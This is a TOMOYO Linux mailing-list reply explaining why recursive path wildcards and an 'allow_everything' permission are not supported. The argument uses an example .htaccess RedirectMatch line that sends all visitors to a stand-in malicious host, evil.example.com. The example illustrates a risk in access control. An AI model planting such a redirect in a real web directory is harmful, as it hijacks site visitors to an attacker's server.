Hello.
Vladimir Petrovic wrote:
> First of all, I'd like to thank you for such a nice product. I was
> working before with selinux (on centos servers) and apparmor (on my
> desktop machine) and tomoyo is definitely the most easy one to setup,
> and yet it is quite powerful (much more then apparmor). I especially
> like how the process tree is displayed and I can see which execution
> path is doing what.
Thank you for using TOMOYO.
> I'm setting it up my desktop machine to "isolate" firefox and similar
> programs from the rest of the system (mandriva 2009.1, tomoyo 1.6.7).
> I've put:
>
> initialize_domain /home/vladap/software/firefox/firefox
> keep_domain /home/vladap/software/firefox/firefox
>
> so I can easily "isolate" firefox. I would like to give permission to
> firefox to do whatever it wants in the
> /home/vladap/data/firefox directory. But, I couldn't find the easy
> way except repeating many times:
>
> path_group FIREFOX <path>/\*
> path_group FIREFOX <path>\*\
> path_group FIREFOX <paht>/\*/\*
> path_group FIREFOX <path>/\*/\*/
> path_group FIREFOX <path>/\*/\*/\*
> ...
>
> and then for subdirectories, and so on. Maybe I didn't find the right
> way, but I think it would be much more usable if tomoyo would support
> something like ** (in apparmour) which would match any character
> including the / (no matter how many subdirectories are there).
This "recursive" option has been asked for several times, but I haven't
implemented it yet. Three reasons. First is that you can create them by
BASE=/home/vladap/software/firefox/firefox
for i in `seq 1 100`
do
echo -n "path_group FIREFOX "$BASE; for j in `seq 1 $i`; do echo -n '/\*';
done; echo
done
if you want.
Second is that I don't like pathnames which don't care basename part.
Quiz: What happens if you granted someone to upload web contents under
/var/www/html/ directory and that person uploaded /var/www/html/.htaccess
with the content shown below?
RedirectMatch (.*) http://evil.example.com/cgibin/poison-it?$1
Answer: The client will be redirected to malicious server.
Not checking the basename part of a pathname causes security problem.
Name based access control can restrict basename part of a pathname while label
based access control can't. This is why TOMOYO was able to merge into mainline.
I want to retain the precision of name based access control as precise as
possible.
The "recursive" option will act something like
allow_write /var/www/html/\*
allow_write /var/www/html/\*/\*
allow_write /var/www/html/\*/\*/\*
and I don't think it is secure. It should be something like
allow_write /var/www/html/\*.html
allow_write /var/www/html/\*/\*.html
allow_write /var/www/html/\*/\*/\*.html
Third is that TOMOYO uses pathname's depth (number of slashes in a pathname)
for avoiding useless comparison that never matches
(e.g. comparing /bin/true and /var/www/html/\*/\*/\*/\*/\*/\*/\*.html ).
Allowing "recursive" option will destroy TOMOYO's string comparison logic.
> Also, then in the domain_policy I have to say
> allow_read/write @FIREFOX
> allow_create @FIREFOX
> allow_unlink ...
> alllow_symlink ...
> allow_rename ...
>
> I also think it would be good to have "allow_everything" option. I
> know that for "proper" security you should not use such "general"
> approach, but for deskop systems I think they would be very useful. Or
> maybe something like that exists and I just couldn't find it :-)
That should be handled by the userland program, not by the kernel.
I won't aggregate them as "everything".
Regards.
_______________________________________________
tomoyo-users-en mailing list
[email protected]
http://lists.sourceforge.jp/mailman/listinfo/tomoyo-users-en
